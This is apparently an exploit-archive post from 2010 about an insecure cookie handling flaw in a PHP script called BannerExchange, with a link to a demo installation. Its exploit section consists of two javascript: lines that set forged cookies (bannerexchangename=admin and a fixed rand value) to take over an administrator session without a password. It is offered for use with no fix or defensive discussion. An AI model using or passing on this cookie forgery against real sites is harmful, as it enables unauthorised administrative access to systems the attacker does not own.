id: 10823
date: 02/10/2010
title: BannerExchange insecure cookie handling vulnerability
author: JiKo
cves: 

=====================================================
BannerExchange insecure cookie handling vulnerability
=====================================================

[~]-----------|01|
    -{Script}
    name :BannerExchange
    link :http://www.ezonescripts.com/productdemos/BannerExchange/account.php?action=account

[~]-----------|02|
    -{3xpl01t}
    javascript:document.cookie="bannerexchangename=admin; path=/";
    javascript:document.cookie="bannerexchangerand=905; path=/";



#  0day.today [2023-03-25]  #